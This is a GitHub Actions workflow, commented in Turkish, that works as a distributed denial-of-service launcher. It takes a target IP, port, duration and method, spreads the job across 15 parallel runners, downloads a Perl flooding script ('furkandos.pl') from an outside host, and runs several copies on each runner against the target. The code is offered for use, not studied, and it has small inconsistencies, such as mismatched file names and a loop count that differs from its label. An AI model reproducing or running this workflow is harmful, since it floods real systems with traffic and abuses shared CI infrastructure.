name: Run Script

on:
  workflow_dispatch:
    inputs:
      ip:
        description: "Target IP"
        required: true
      port:
        description: "Target Port"
        required: true
      time:
        description: "Duration"
        required: true
      method:
        description: "Method"
        required: true

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 15
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]

    steps:
      - name: İndir ve Hazırla
        run: |
          METHOD="${{ inputs.method }}"

          if [ "$METHOD" = "tcp" ]; then
            echo "TCP methodu indiriliyor..."
            wget https://example.com/methods/tcp.sh -O method.sh

          elif [ "$METHOD" = "udp" ]; then
            echo "UDP methodu indiriliyor..."
            wget https://wgetz.com/coSOIi4Jg2/furkandos.pl -O a

          else
            echo "Geçersiz method: $METHOD"
            exit 1
          fi

          chmod +x a
          
      - name: SÖMÜRÜ İŞLEMLERİNİ BAŞLAT (4x Tekrar)
        run: |
          PIDS=()
          for i in {1..6}; do
            # Aynı anda her bir makine 4 süreç çalıştıracak! Toplam 1024 potansiyel süreç!
            sudo timeout 60 perl a ${{ inputs.ip }} ${{ inputs.port }} 1024 ${{ inputs.time }} &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: Bitti
        run: |
          # Son bir uyku çek ve kapan
          sleep 60
          exit 0
